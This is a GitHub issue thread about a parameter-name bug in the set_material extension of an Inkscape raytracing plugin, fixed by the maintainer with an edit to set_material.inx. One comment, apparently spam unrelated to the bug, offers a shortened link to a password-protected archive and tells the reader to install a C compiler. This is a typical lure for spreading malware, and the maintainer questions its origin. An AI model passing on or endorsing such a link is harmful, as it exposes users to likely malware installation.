### ISSUE TITLE
Set material issue

### ISSUE THREAD

**Issue by HiHatDoDot** [BenediktBurger/inkscape-raytracing#3]
Hi,

I have this version of Inkscape : Inkscape 1.2-alpha1 (8468572332, 2022-03-08)
The master from Damien Bloch works fine.

But when I tried yours, I got this message : 
----
usage: set_material.py [-h] [--output OUTPUT]
                       [--optical_material OPTICAL_MATERIAL]
                       [--optical_index OPTICAL_INDEX]
                       [--dispersion DISPERSION] [--wavelength WAVELENGTH]
                       [--dichroic_reflection DICHROIC_REFLECTION] [--id IDS]
                       [--selected-nodes SELECTED_NODES]
                       [INPUT_FILE]
set_material.py: error: argument INPUT_FILE: File not found: --optical_index (500 nm)=1.5168
----

**Comment by pinpolhoxx** [comment]
maybe this will help
https://bit.ly/3TzaAQd
Archive codepass: changeme

you may need to install the c compiler

**Comment by HiHatDoDot** [comment]
> maybe this will help https://bit.ly/3TzaAQd Archive codepass: changeme
> 
> you may need to install the c compiler

Cannot do that ; this download or installation cannot be done in my organisation pc.

**Comment by BenediktBurger** [comment]
Sorry, that I did not see this issue.
I forgot to activate to watch my repository (why does a forked repository ignore new activity?).

>> maybe this will help https://bit.ly/3TzaAQd Archive codepass: changeme
>> you may need to install the c compiler

where do you have this from?

I guess I found the error in:
https://github.com/BenediktBurger/inkscape-raytracing/blob/755c3a25d7124e03d941ff6ff426ebc3fa5acd8a/inkscape_raytracing/set_material.inx#L24

Would you mind to replace `name="optical_index (500 nm)"` by `name="optical_index"`?
At the same time, the wavelength should enter in the gui-text: `gui-text="Optical index (500 nm):"`.

**Comment by HiHatDoDot** [comment]
Thanks Benedik,

I did the replacement and it seems to work.
Not sure about what you mean in the second sentence,

**Comment by BenediktBurger** [comment]
You just fixed the error for yourself, while it is still broken for everyone else, therefore I reopen the issue, until it is fixed in this repository.

Do you want to open a pull request?

> I did the replacement and it seems to work.

Thanks for letting me know!

**Comment by BenediktBurger** [comment]
I made the change to this repository, therefore, it should work now for everyone downloading it.
